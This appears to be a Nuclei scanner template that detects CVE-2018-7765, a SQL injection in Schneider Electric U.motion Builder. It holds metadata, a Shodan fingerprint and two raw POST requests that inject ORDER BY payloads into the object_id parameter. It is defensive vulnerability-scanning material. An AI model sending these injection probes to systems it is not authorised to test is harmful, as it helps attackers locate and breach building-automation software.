id: CVE-2018-7765

info:
  name: Schneider Electric U.motion Builder - SQL Injection
  author: daffainfo
  severity: high
  description: |
    The vulnerability exists within processing of track_import_export.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. The underlying SQLite database query is subject to SQL injection on the object_id input parameter.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to version v1.3.4 or later.
  reference:
    - http://seclists.org/fulldisclosure/2019/May/26
    - https://www.schneider-electric.com/en/download/document/SEVD-2018-095-01/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-7765
    cwe-id: CWE-89
    epss-score: 0.06089
    epss-percentile: 0.90915
    cpe: cpe:2.3:a:schneider-electric:u.motion_builder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-requests: 2
    vendor: schneider-electric
    product: u.motion_builder
    shodan-query: http.headers_hash:1985490094
  tags: cve,cve2018,schneider-electric,sqli,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=1' order by 1--

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'Object', 'Period') && !contains(body,'Invalid argument supplied for foreach')"
          - "contains(content_type, 'application/octet-stream')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=1' order by 2--

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'Object', 'Period', 'Invalid argument supplied for foreach')"
          - "contains(content_type, 'application/octet-stream')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502200b98caf4d8bcfed033b843510d568069ea503a0f1f69afb73b9354802d8fe8a0022100e329f66b510a4e889406bd590a156e22f4766eb2f856c626c59eac4fffbe1065:922c64590222798bb761d5b6d8e72950